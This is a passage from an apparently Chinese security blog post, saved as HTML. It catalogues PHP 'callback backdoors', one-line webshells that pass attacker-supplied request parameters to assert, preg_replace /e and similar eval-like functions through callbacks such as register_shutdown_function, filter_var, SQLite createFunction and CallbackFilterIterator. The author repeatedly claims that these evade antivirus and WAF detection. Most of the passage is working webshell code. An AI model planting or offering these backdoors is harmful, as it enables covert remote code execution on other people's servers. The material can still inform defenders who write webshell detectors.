class="variable">$e</code><code class="plain">, </code><code class="string">''</code><code class="plain">);</code></td></tr></tbody></table></div></div></div>
&nbsp; &nbsp; 如图，这个后门可以在5.3下使用：
<p>
	&nbsp;&nbsp;&nbsp;&nbsp;<a target="_blank" href="https://dn-leavesongs.qbox.me/content/uploadfile/201507/fa4a1437157665.png" id="ematt:966" class="highslide"><img src="./创造tips的秘籍——PHP回调后门 - 离别歌_files/thum-fa4a1437157665.png" title="点击查看原图" alt="QQ20150718-12@2x.png" border="0" width="650" height="329"></a> 
</p>
<p>
	&nbsp; &nbsp; 但强大的D盾还是有警觉（虽然只是等级2）：
</p>
<p>
	&nbsp;&nbsp;&nbsp;&nbsp;<a target="_blank" href="https://dn-leavesongs.qbox.me/content/uploadfile/201507/c4a41437157785.png" id="ematt:968" class="highslide"><img src="./创造tips的秘籍——PHP回调后门 - 离别歌_files/thum-c4a41437157785.png" title="点击查看原图" alt="QQ20150718-13@2x.png" border="0" width="650" height="286"></a> 
</p>
<p>
	&nbsp; &nbsp; 不过呵呵，PHP拥有那么多灵活的函数，稍微改个函数（array_walk_recursive）D盾就查不出来了：
</p>
<div id="highlighter_21770" class="syntaxhighlighter  "><div class="bar"><div class="toolbar"><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#viewSource" title="view source" class="item viewSource" style="width: 16px; height: 16px;">view source</a><div class="item copyToClipboard"><embed width="16" height="16" id="highlighter_21770_clipboard" type="application/x-shockwave-flash" title="copy to clipboard" allowscriptaccess="always" wmode="transparent" flashvars="highlighterId=highlighter_21770" menu="false" src="https://www.leavesongs.com/content/plugins/et_highlighter51/scripts/clipboard.swf"></div><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#printSource" title="print" class="item printSource" style="width: 16px; height: 16px;">print</a><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#about" title="?" class="item about" style="width: 16px; height: 16px;">?</a></div></div><div class="lines"><div class="line alt1"><table><tbody><tr><td class="number"><code>1</code></td><td class="content"><code class="variable">$e</code> <code class="plain">= </code><code class="variable">$_REQUEST</code><code class="plain">[</code><code class="string">'e'</code><code class="plain">];</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="number"><code>2</code></td><td class="content"><code class="variable">$arr</code> <code class="plain">= </code><code class="keyword">array</code><code class="plain">(</code><code class="variable">$_POST</code><code class="plain">[</code><code class="string">'pass'</code><code class="plain">] =&gt; </code><code class="string">'|.*|e'</code><code class="plain">,);</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="number"><code>3</code></td><td class="content"><code class="functions">array_walk_recursive</code><code class="plain">(</code><code class="variable">$arr</code><code class="plain">, </code><code class="variable">$e</code><code class="plain">, </code><code class="string">''</code><code class="plain">);</code></td></tr></tbody></table></div></div></div>
&nbsp; &nbsp; 不截图了。
<p>
	&nbsp; &nbsp; 看了以上几个回调后门，发现preg_replace确实好用。但显然很多WAF和顿顿狗狗的早就盯上这个函数了。其实php里不止这个函数可以执行eval的功能，还有几个类似的：
</p>
<div id="highlighter_288673" class="syntaxhighlighter  "><div class="bar"><div class="toolbar"><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#viewSource" title="view source" class="item viewSource" style="width: 16px; height: 16px;">view source</a><div class="item copyToClipboard"><embed width="16" height="16" id="highlighter_288673_clipboard" type="application/x-shockwave-flash" title="copy to clipboard" allowscriptaccess="always" wmode="transparent" flashvars="highlighterId=highlighter_288673" menu="false" src="https://www.leavesongs.com/content/plugins/et_highlighter51/scripts/clipboard.swf"></div><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#printSource" title="print" class="item printSource" style="width: 16px; height: 16px;">print</a><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#about" title="?" class="item about" style="width: 16px; height: 16px;">?</a></div></div><div class="lines"><div class="line alt1"><table><tbody><tr><td class="number"><code>1</code></td><td class="content"><code class="plain">mb_ereg_replace(</code><code class="string">'.*'</code><code class="plain">, </code><code class="variable">$_REQUEST</code><code class="plain">[</code><code class="string">'pass'</code><code class="plain">], </code><code class="string">''</code><code class="plain">, </code><code class="string">'e'</code><code class="plain">);</code></td></tr></tbody></table></div></div></div>
&nbsp; &nbsp; 另一个：
<div id="highlighter_739302" class="syntaxhighlighter  "><div class="bar"><div class="toolbar"><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#viewSource" title="view source" class="item viewSource" style="width: 16px; height: 16px;">view source</a><div class="item copyToClipboard"><embed width="16" height="16" id="highlighter_739302_clipboard" type="application/x-shockwave-flash" title="copy to clipboard" allowscriptaccess="always" wmode="transparent" flashvars="highlighterId=highlighter_739302" menu="false" src="https://www.leavesongs.com/content/plugins/et_highlighter51/scripts/clipboard.swf"></div><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#printSource" title="print" class="item printSource" style="width: 16px; height: 16px;">print</a><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#about" title="?" class="item about" style="width: 16px; height: 16px;">?</a></div></div><div class="lines"><div class="line alt1"><table><tbody><tr><td class="number"><code>1</code></td><td class="content"><code class="functions">echo</code> <code class="plain">preg_filter(</code><code class="string">'|.*|e'</code><code class="plain">, </code><code class="variable">$_REQUEST</code><code class="plain">[</code><code class="string">'pass'</code><code class="plain">], </code><code class="string">''</code><code class="plain">);</code></td></tr></tbody></table></div></div></div>
&nbsp; &nbsp; 这两个一句话都是不杀的：
<p>
	&nbsp;&nbsp;&nbsp;&nbsp;<a target="_blank" href="https://dn-leavesongs.qbox.me/content/uploadfile/201507/98fa1437158638.png" id="ematt:970" class="highslide"><img src="./创造tips的秘籍——PHP回调后门 - 离别歌_files/thum-98fa1437158638.png" title="点击查看原图" alt="QQ20150718-14@2x.png" border="0" width="650" height="298"></a> 
</p>
<p>
	&nbsp;&nbsp;&nbsp;&nbsp;<a target="_blank" href="https://dn-leavesongs.qbox.me/content/uploadfile/201507/8c131437158645.png" id="ematt:972" class="highslide"><img src="./创造tips的秘籍——PHP回调后门 - 离别歌_files/thum-8c131437158645.png" title="点击查看原图" alt="QQ20150718-15@2x.png" border="0" width="650" height="284"></a> 
</p>
<p>
	&nbsp; &nbsp; 好用的一句话，且用且珍惜呀。
</p>
<p>
	<br>
</p>
<p>
	<strong>0x05 无回显回调后门</strong> 
</p>
<p>
	&nbsp; &nbsp; 回调后门里，有个特殊的例子：ob_start。
</p>
<p>
	&nbsp; &nbsp; ob_start可以传入一个参数，也就是当缓冲流输出时调用的函数。但由于某些特殊原因（可能与输出流有关），即使有执行结果也不在流里，最后也输出不了，所以这样的一句话没法用菜刀连接：
</p>
<div id="highlighter_256071" class="syntaxhighlighter  "><div class="bar"><div class="toolbar"><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#viewSource" title="view source" class="item viewSource" style="width: 16px; height: 16px;">view source</a><div class="item copyToClipboard"><embed width="16" height="16" id="highlighter_256071_clipboard" type="application/x-shockwave-flash" title="copy to clipboard" allowscriptaccess="always" wmode="transparent" flashvars="highlighterId=highlighter_256071" menu="false" src="https://www.leavesongs.com/content/plugins/et_highlighter51/scripts/clipboard.swf"></div><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#printSource" title="print" class="item printSource" style="width: 16px; height: 16px;">print</a><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#about" title="?" class="item about" style="width: 16px; height: 16px;">?</a></div></div><div class="lines"><div class="line alt1"><table><tbody><tr><td class="number"><code>1</code></td><td class="content"><code class="plain">ob_start(</code><code class="string">'assert'</code><code class="plain">);</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="number"><code>2</code></td><td class="content"><code class="functions">echo</code> <code class="variable">$_REQUEST</code><code class="plain">[</code><code class="string">'pass'</code><code class="plain">];</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="number"><code>3</code></td><td class="content"><code class="plain">ob_end_flush();</code></td></tr></tbody></table></div></div></div>
&nbsp;&nbsp;&nbsp;&nbsp;但如果执行一个url请求，用神器cloudeye还是能够观测到结果的：
<p>
	&nbsp;&nbsp;&nbsp;&nbsp;<a target="_blank" href="https://dn-leavesongs.qbox.me/content/uploadfile/201507/54a81437160925.png" id="ematt:976" class="highslide"><img src="./创造tips的秘籍——PHP回调后门 - 离别歌_files/thum-54a81437160925.png" title="点击查看原图" alt="QQ20150718-17@2x.png" border="0" width="650" height="383"></a> 
</p>
<p>
	&nbsp;&nbsp;&nbsp;&nbsp;<a target="_blank" href="https://dn-leavesongs.qbox.me/content/uploadfile/201507/b21a1437160923.png" id="ematt:974" class="highslide"><img src="./创造tips的秘籍——PHP回调后门 - 离别歌_files/thum-b21a1437160923.png" title="点击查看原图" alt="QQ20150718-16@2x.png" border="0" width="650" height="167"></a> 
</p>
<p>
	&nbsp; &nbsp; 即使没输出，实际代码是执行了的。也算作回调后门的一种。
</p>
<p>
	<br>
</p>
<p>
	<strong>0x06 单参数后门终极奥义</strong> 
</p>
<p>
	&nbsp; &nbsp; preg_replace、三参数后门虽然好用，但/e模式php5.5以后就废弃了，不知道哪天就会给删了。所以我觉得还是单参数后门，在各个版本都比较好驾驭。
</p>
<p>
	&nbsp; &nbsp; 这里给出几个好用不杀的回调后门
</p>
<div id="highlighter_806823" class="syntaxhighlighter  "><div class="bar"><div class="toolbar"><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#viewSource" title="view source" class="item viewSource" style="width: 16px; height: 16px;">view source</a><div class="item copyToClipboard"><embed width="16" height="16" id="highlighter_806823_clipboard" type="application/x-shockwave-flash" title="copy to clipboard" allowscriptaccess="always" wmode="transparent" flashvars="highlighterId=highlighter_806823" menu="false" src="https://www.leavesongs.com/content/plugins/et_highlighter51/scripts/clipboard.swf"></div><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#printSource" title="print" class="item printSource" style="width: 16px; height: 16px;">print</a><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#about" title="?" class="item about" style="width: 16px; height: 16px;">?</a></div></div><div class="lines"><div class="line alt1"><table><tbody><tr><td class="number"><code>1</code></td><td class="content"><code class="variable">$e</code> <code class="plain">= </code><code class="variable">$_REQUEST</code><code class="plain">[</code><code class="string">'e'</code><code class="plain">];</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="number"><code>2</code></td><td class="content"><code class="plain">register_shutdown_function(</code><code class="variable">$e</code><code class="plain">, </code><code class="variable">$_REQUEST</code><code class="plain">[</code><code class="string">'pass'</code><code class="plain">]);</code></td></tr></tbody></table></div></div></div>
&nbsp; &nbsp; 这个是php全版本支持的，且不报不杀稳定执行：
<p>
	&nbsp;&nbsp;&nbsp;&nbsp;<a target="_blank" href="https://dn-leavesongs.qbox.me/content/uploadfile/201507/efb21437200234.png" id="ematt:980" class="highslide"><img src="./创造tips的秘籍——PHP回调后门 - 离别歌_files/thum-efb21437200234.png" title="点击查看原图" alt="QQ20150718-19@2x.png" border="0" width="650" height="309"></a> 
</p>
<p>
	&nbsp;&nbsp;&nbsp;&nbsp;<a target="_blank" href="https://dn-leavesongs.qbox.me/content/uploadfile/201507/4aec1437200232.png" id="ematt:978" class="highslide"><img src="./创造tips的秘籍——PHP回调后门 - 离别歌_files/thum-4aec1437200232.png" title="点击查看原图" alt="QQ20150718-18@2x.png" border="0" width="650" height="291"></a> 
</p>
<p>
	&nbsp; &nbsp; 再来一个：
</p>
<div id="highlighter_245949" class="syntaxhighlighter  "><div class="bar"><div class="toolbar"><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#viewSource" title="view source" class="item viewSource" style="width: 16px; height: 16px;">view source</a><div class="item copyToClipboard"><embed width="16" height="16" id="highlighter_245949_clipboard" type="application/x-shockwave-flash" title="copy to clipboard" allowscriptaccess="always" wmode="transparent" flashvars="highlighterId=highlighter_245949" menu="false" src="https://www.leavesongs.com/content/plugins/et_highlighter51/scripts/clipboard.swf"></div><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#printSource" title="print" class="item printSource" style="width: 16px; height: 16px;">print</a><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#about" title="?" class="item about" style="width: 16px; height: 16px;">?</a></div></div><div class="lines"><div class="line alt1"><table><tbody><tr><td class="number"><code>1</code></td><td class="content"><code class="variable">$e</code> <code class="plain">= </code><code class="variable">$_REQUEST</code><code class="plain">[</code><code class="string">'e'</code><code class="plain">];</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="number"><code>2</code></td><td class="content"><code class="keyword">declare</code><code class="plain">(ticks=1);</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="number"><code>3</code></td><td class="content"><code class="plain">register_tick_function (</code><code class="variable">$e</code><code class="plain">, </code><code class="variable">$_REQUEST</code><code class="plain">[</code><code class="string">'pass'</code><code class="plain">]);</code></td></tr></tbody></table></div></div></div>
&nbsp; &nbsp; 再来两个：
<div id="highlighter_593860" class="syntaxhighlighter  "><div class="bar"><div class="toolbar"><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#viewSource" title="view source" class="item viewSource" style="width: 16px; height: 16px;">view source</a><div class="item copyToClipboard"><embed width="16" height="16" id="highlighter_593860_clipboard" type="application/x-shockwave-flash" title="copy to clipboard" allowscriptaccess="always" wmode="transparent" flashvars="highlighterId=highlighter_593860" menu="false" src="https://www.leavesongs.com/content/plugins/et_highlighter51/scripts/clipboard.swf"></div><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#printSource" title="print" class="item printSource" style="width: 16px; height: 16px;">print</a><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#about" title="?" class="item about" style="width: 16px; height: 16px;">?</a></div></div><div class="lines"><div class="line alt1"><table><tbody><tr><td class="number"><code>1</code></td><td class="content"><code class="plain">filter_var(</code><code class="variable">$_REQUEST</code><code class="plain">[</code><code class="string">'pass'</code><code class="plain">], FILTER_CALLBACK, </code><code class="keyword">array</code><code class="plain">(</code><code class="string">'options'</code> <code class="plain">=&gt; </code><code class="string">'assert'</code><code class="plain">));</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="number"><code>2</code></td><td class="content"><code class="plain">filter_var_array(</code><code class="keyword">array</code><code class="plain">(</code><code class="string">'test'</code> <code class="plain">=&gt; </code><code class="variable">$_REQUEST</code><code class="plain">[</code><code class="string">'pass'</code><code class="plain">]), </code><code class="keyword">array</code><code class="plain">(</code><code class="string">'test'</code> <code class="plain">=&gt; </code><code class="keyword">array</code><code class="plain">(</code><code class="string">'filter'</code> <code class="plain">=&gt; FILTER_CALLBACK, </code><code class="string">'options'</code> <code class="plain">=&gt; </code><code class="string">'assert'</code><code class="plain">)));</code></td></tr></tbody></table></div></div></div>
&nbsp; &nbsp; 这两个是filter_var的利用，php里用这个函数来过滤数组，只要指定过滤方法为回调（FILTER_CALLBACK），且option为assert即可。
<p>
	&nbsp; &nbsp; 这几个单参数回调后门非常隐蔽，基本没特征，用起来很6.
</p>
<p>
	<br>
</p>
<p>
	<strong>0x07 数据库操作与第三方库中的回调后门</strong> 
</p>
<p>
	&nbsp; &nbsp; 回到最早微博上发出来的那个sqlite回调后门，其实sqlite可以构造的回调后门不止上述一个。
</p>
<p>
	&nbsp; &nbsp; 我们可以注册一个sqlite函数，使之与assert功能相同。当执行这个sql语句的时候，就等于执行了assert。所以这个后门我这样构造：
</p>
<div id="highlighter_960723" class="syntaxhighlighter  "><div class="bar"><div class="toolbar"><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#viewSource" title="view source" class="item viewSource" style="width: 16px; height: 16px;">view source</a><div class="item copyToClipboard"><embed width="16" height="16" id="highlighter_960723_clipboard" type="application/x-shockwave-flash" title="copy to clipboard" allowscriptaccess="always" wmode="transparent" flashvars="highlighterId=highlighter_960723" menu="false" src="https://www.leavesongs.com/content/plugins/et_highlighter51/scripts/clipboard.swf"></div><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#printSource" title="print" class="item printSource" style="width: 16px; height: 16px;">print</a><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#about" title="?" class="item about" style="width: 16px; height: 16px;">?</a></div></div><div class="lines"><div class="line alt1"><table><tbody><tr><td class="number"><code>1</code></td><td class="content"><code class="variable">$e</code> <code class="plain">= </code><code class="variable">$_REQUEST</code><code class="plain">[</code><code class="string">'e'</code><code class="plain">];</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="number"><code>2</code></td><td class="content"><code class="variable">$db</code> <code class="plain">= </code><code class="keyword">new</code> <code class="plain">PDO(</code><code class="string">'sqlite:sqlite.db3'</code><code class="plain">);</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="number"><code>3</code></td><td class="content"><code class="variable">$db</code><code class="plain">-&gt;sqliteCreateFunction(</code><code class="string">'myfunc'</code><code class="plain">, </code><code class="variable">$e</code><code class="plain">, 1);</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="number"><code>4</code></td><td class="content"><code class="variable">$sth</code> <code class="plain">= </code><code class="variable">$db</code><code class="plain">-&gt;prepare(</code><code class="string">"SELECT myfunc(:exec)"</code><code class="plain">);</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="number"><code>5</code></td><td class="content"><code class="variable">$sth</code><code class="plain">-&gt;execute(</code><code class="keyword">array</code><code class="plain">(</code><code class="string">':exec'</code> <code class="plain">=&gt; </code><code class="variable">$_REQUEST</code><code class="plain">[</code><code class="string">'pass'</code><code class="plain">]));</code></td></tr></tbody></table></div></div></div>
&nbsp; &nbsp; 执行之：
<p>
	&nbsp;&nbsp;&nbsp;&nbsp;<a target="_blank" href="https://dn-leavesongs.qbox.me/content/uploadfile/201507/02e21437200976.png" id="ematt:982" class="highslide"><img src="./创造tips的秘籍——PHP回调后门 - 离别歌_files/thum-02e21437200976.png" title="点击查看原图" alt="QQ20150718-20@2x.png" border="0" width="650" height="293"></a> 
</p>
<p>
	&nbsp; &nbsp; 上面的sqlite方法是依靠PDO执行的，我们也可以直接调用sqlite3的方法构造回调后门：
</p>
<div id="highlighter_579758" class="syntaxhighlighter  "><div class="bar"><div class="toolbar"><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#viewSource" title="view source" class="item viewSource" style="width: 16px; height: 16px;">view source</a><div class="item copyToClipboard"><embed width="16" height="16" id="highlighter_579758_clipboard" type="application/x-shockwave-flash" title="copy to clipboard" allowscriptaccess="always" wmode="transparent" flashvars="highlighterId=highlighter_579758" menu="false" src="https://www.leavesongs.com/content/plugins/et_highlighter51/scripts/clipboard.swf"></div><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#printSource" title="print" class="item printSource" style="width: 16px; height: 16px;">print</a><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#about" title="?" class="item about" style="width: 16px; height: 16px;">?</a></div></div><div class="lines"><div class="line alt1"><table><tbody><tr><td class="number"><code>1</code></td><td class="content"><code class="variable">$e</code> <code class="plain">= </code><code class="variable">$_REQUEST</code><code class="plain">[</code><code class="string">'e'</code><code class="plain">];</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="number"><code>2</code></td><td class="content"><code class="variable">$db</code> <code class="plain">= </code><code class="keyword">new</code> <code class="plain">SQLite3(</code><code class="string">'sqlite.db3'</code><code class="plain">);</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="number"><code>3</code></td><td class="content"><code class="variable">$db</code><code class="plain">-&gt;createFunction(</code><code class="string">'myfunc'</code><code class="plain">, </code><code class="variable">$e</code><code class="plain">);</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="number"><code>4</code></td><td class="content"><code class="variable">$stmt</code> <code class="plain">= </code><code class="variable">$db</code><code class="plain">-&gt;prepare(</code><code class="string">"SELECT myfunc(?)"</code><code class="plain">);</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="number"><code>5</code></td><td class="content"><code class="variable">$stmt</code><code class="plain">-&gt;bindValue(1, </code><code class="variable">$_REQUEST</code><code class="plain">[</code><code class="string">'pass'</code><code class="plain">], SQLITE3_TEXT);</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="number"><code>6</code></td><td class="content"><code class="variable">$stmt</code><code class="plain">-&gt;execute();</code></td></tr></tbody></table></div></div></div>
&nbsp; &nbsp; 前提是php5.3以上。如果是php5.3以下的，使用sqlite_*函数，自己研究我不列出了。
<p>
	&nbsp; &nbsp; 这两个回调后门，都是依靠php扩展库（pdo和sqlite3）来实现的。其实如果目标环境中有特定扩展库的情况下，也可以来构造回调后门。
</p>
<p>
	&nbsp; &nbsp; 比如php_yaml：
</p>
<div id="highlighter_944719" class="syntaxhighlighter  "><div class="bar"><div class="toolbar"><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#viewSource" title="view source" class="item viewSource" style="width: 16px; height: 16px;">view source</a><div class="item copyToClipboard"><embed width="16" height="16" id="highlighter_944719_clipboard" type="application/x-shockwave-flash" title="copy to clipboard" allowscriptaccess="always" wmode="transparent" flashvars="highlighterId=highlighter_944719" menu="false" src="https://www.leavesongs.com/content/plugins/et_highlighter51/scripts/clipboard.swf"></div><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#printSource" title="print" class="item printSource" style="width: 16px; height: 16px;">print</a><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#about" title="?" class="item about" style="width: 16px; height: 16px;">?</a></div></div><div class="lines"><div class="line alt1"><table><tbody><tr><td class="number"><code>1</code></td><td class="content"><code class="variable">$str</code> <code class="plain">= urlencode(</code><code class="variable">$_REQUEST</code><code class="plain">[</code><code class="string">'pass'</code><code class="plain">]);</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="number"><code>2</code></td><td class="content"><code class="variable">$yaml</code> <code class="plain">= &lt;&lt;&lt;EOD</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="number"><code>3</code></td><td class="content"><code class="plain">greeting: !{</code><code class="variable">$str</code><code class="plain">} </code><code class="string">"|.+|e"</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="number"><code>4</code></td><td class="content"><code class="plain">EOD;</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="number"><code>5</code></td><td class="content"><code class="variable">$parsed</code> <code class="plain">= yaml_parse(</code><code class="variable">$yaml</code><code class="plain">, 0, </code><code class="variable">$cnt</code><code class="plain">, </code><code class="keyword">array</code><code class="plain">(</code><code class="string">"!{$_REQUEST['pass']}"</code> <code class="plain">=&gt; </code><code class="string">'preg_replace'</code><code class="plain">));</code></td></tr></tbody></table></div></div></div>
&nbsp; &nbsp; 还有php_memcached：
<div id="highlighter_737690" class="syntaxhighlighter  "><div class="bar"><div class="toolbar"><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#viewSource" title="view source" class="item viewSource" style="width: 16px; height: 16px;">view source</a><div class="item copyToClipboard"><embed width="16" height="16" id="highlighter_737690_clipboard" type="application/x-shockwave-flash" title="copy to clipboard" allowscriptaccess="always" wmode="transparent" flashvars="highlighterId=highlighter_737690" menu="false" src="https://www.leavesongs.com/content/plugins/et_highlighter51/scripts/clipboard.swf"></div><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#printSource" title="print" class="item printSource" style="width: 16px; height: 16px;">print</a><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#about" title="?" class="item about" style="width: 16px; height: 16px;">?</a></div></div><div class="lines"><div class="line alt1"><table><tbody><tr><td class="number"><code>1</code></td><td class="content"><code class="variable">$mem</code> <code class="plain">= </code><code class="keyword">new</code> <code class="plain">Memcache();</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="number"><code>2</code></td><td class="content"><code class="variable">$re</code> <code class="plain">= </code><code class="variable">$mem</code><code class="plain">-&gt;addServer(</code><code class="string">'localhost'</code><code class="plain">, 11211, TRUE, 100, 0, -1, TRUE, create_function(</code><code class="string">'$a,$b,$c,$d,$e'</code><code class="plain">, </code><code class="string">'return assert($a);'</code><code class="plain">));</code></td></tr></tbody></table></div><div class="line alt1"><table><tbody><tr><td class="number"><code>3</code></td><td class="content"><code class="variable">$mem</code><code class="plain">-&gt;connect(</code><code class="variable">$_REQUEST</code><code class="plain">[</code><code class="string">'pass'</code><code class="plain">], 11211, 0);</code></td></tr></tbody></table></div></div></div>
&nbsp; &nbsp; 自行研究吧。
<p>
	<br>
</p>
<p>
	<strong>0x08 其他参数型回调后门</strong> 
</p>
<p>
	&nbsp; &nbsp; 上面说了，回调函数格式为1、2、3参数的时候，可以利用assert、assert、preg_replace来执行代码。但如果回调函数的格式是其他参数数目，或者参数类型不是简单字符串，怎么办？
</p>
<p>
	&nbsp; &nbsp; 举个例子，php5.5以后建议用preg_replace_callback代替preg_replace的/e模式来处理正则执行替换，那么其实preg_replace_callback也是可以构造回调后门的。
</p>
<p>
	&nbsp;&nbsp;&nbsp;&nbsp;preg_replace_callback的第二个参数是回调函数，但这个回调函数被传入的参数是一个数组，如果直接将这个指定为assert，就会执行不了，因为assert接受的参数是字符串。
</p>
<p>
	&nbsp; &nbsp; 所以我们需要去“构造”一个满足条件的回调函数。
</p>
<p>
	&nbsp; &nbsp; 怎么构造？使用create_function：
</p>
<div id="highlighter_985629" class="syntaxhighlighter  "><div class="bar"><div class="toolbar"><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#viewSource" title="view source" class="item viewSource" style="width: 16px; height: 16px;">view source</a><div class="item copyToClipboard"><embed width="16" height="16" id="highlighter_985629_clipboard" type="application/x-shockwave-flash" title="copy to clipboard" allowscriptaccess="always" wmode="transparent" flashvars="highlighterId=highlighter_985629" menu="false" src="https://www.leavesongs.com/content/plugins/et_highlighter51/scripts/clipboard.swf"></div><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#printSource" title="print" class="item printSource" style="width: 16px; height: 16px;">print</a><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#about" title="?" class="item about" style="width: 16px; height: 16px;">?</a></div></div><div class="lines"><div class="line alt1"><table><tbody><tr><td class="number"><code>1</code></td><td class="content"><code class="plain">preg_replace_callback(</code><code class="string">'/.+/i'</code><code class="plain">, create_function(</code><code class="string">'$arr'</code><code class="plain">, </code><code class="string">'return assert($arr[0]);'</code><code class="plain">), </code><code class="variable">$_REQUEST</code><code class="plain">[</code><code class="string">'pass'</code><code class="plain">]);</code></td></tr></tbody></table></div></div></div>
&nbsp; &nbsp; “创造”一个函数，它接受一个数组，并将数组的第一个元素$arr[0]传入assert。
<p>
	<br>
</p>
<p>
	&nbsp; &nbsp; 这也是一个不杀不报稳定执行的回调后门，但因为有create_function这个敏感函数，所以看起来总是不太爽。不过也是没办法的事。
</p>
<p>
	&nbsp; &nbsp; 类似的，这个也同样：
</p>
<div id="highlighter_705280" class="syntaxhighlighter  "><div class="bar"><div class="toolbar"><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#viewSource" title="view source" class="item viewSource" style="width: 16px; height: 16px;">view source</a><div class="item copyToClipboard"><embed width="16" height="16" id="highlighter_705280_clipboard" type="application/x-shockwave-flash" title="copy to clipboard" allowscriptaccess="always" wmode="transparent" flashvars="highlighterId=highlighter_705280" menu="false" src="https://www.leavesongs.com/content/plugins/et_highlighter51/scripts/clipboard.swf"></div><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#printSource" title="print" class="item printSource" style="width: 16px; height: 16px;">print</a><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#about" title="?" class="item about" style="width: 16px; height: 16px;">?</a></div></div><div class="lines"><div class="line alt1"><table><tbody><tr><td class="number"><code>1</code></td><td class="content"><code class="plain">mb_ereg_replace_callback(</code><code class="string">'.+'</code><code class="plain">, create_function(</code><code class="string">'$arr'</code><code class="plain">, </code><code class="string">'return assert($arr[0]);'</code><code class="plain">), </code><code class="variable">$_REQUEST</code><code class="plain">[</code><code class="string">'pass'</code><code class="plain">]);</code></td></tr></tbody></table></div></div></div>
&nbsp; &nbsp; 再来一个利用CallbackFilterIterator方法的回调后门：
<div id="highlighter_298378" class="syntaxhighlighter  "><div class="bar"><div class="toolbar"><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#viewSource" title="view source" class="item viewSource" style="width: 16px; height: 16px;">view source</a><div class="item copyToClipboard"><embed width="16" height="16" id="highlighter_298378_clipboard" type="application/x-shockwave-flash" title="copy to clipboard" allowscriptaccess="always" wmode="transparent" flashvars="highlighterId=highlighter_298378" menu="false" src="https://www.leavesongs.com/content/plugins/et_highlighter51/scripts/clipboard.swf"></div><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#printSource" title="print" class="item printSource" style="width: 16px; height: 16px;">print</a><a href="https://www.leavesongs.com/PENETRATION/php-callback-backdoor.html#about" title="?" class="item about" style="width: 16px; height: 16px;">?</a></div></div><div class="lines"><div class="line alt1"><table><tbody><tr><td class="number"><code>1</code></td><td class="content"><code class="variable">$iterator</code> <code class="plain">= </code><code class="keyword">new</code> <code class="plain">CallbackFilterIterator(</code><code class="keyword">new</code> <code class="plain">ArrayIterator(</code><code class="keyword">array</code><code class="plain">(</code><code class="variable">$_REQUEST</code><code class="plain">[</code><code class="string">'pass'</code><code class="plain">],)), create_function(</code><code class="string">'$a'</code><code class="plain">, </code><code class="string">'assert($a);'</code><code class="plain">));</code></td></tr></tbody></table></div><div class="line alt2"><table><tbody><tr><td class="number"><code>2</code></td><td class="content"><code class="keyword">foreach</code> <code class="plain">(</code><code 